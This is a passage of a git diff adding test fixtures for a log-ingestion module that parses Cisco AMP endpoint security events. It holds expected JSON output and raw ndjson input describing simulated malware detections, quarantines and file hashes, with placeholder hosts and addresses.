"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": 
"\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47266, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258118058508361", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258118058508000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": 
"Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 48591, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667837389570068", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 689000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667837389570000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49910, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258066518900808", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 608000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258066518901000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 51229, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + 
}, + { + "@timestamp": "2021-01-15T10:13:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258014979293255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 581000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258014979293000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 52548, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + 
"mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257963439685702", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 569000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257963439686000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 53867, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667579691532307", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + 
"cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 778000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55186, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532306", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + 
"cisco.amp.timestamp_nanoseconds": 747000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56512, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532305", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 371000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 57830, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log new file mode 100644 index 00000000000..f31bf18a23a --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log 
@@ -0,0 +1,100 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
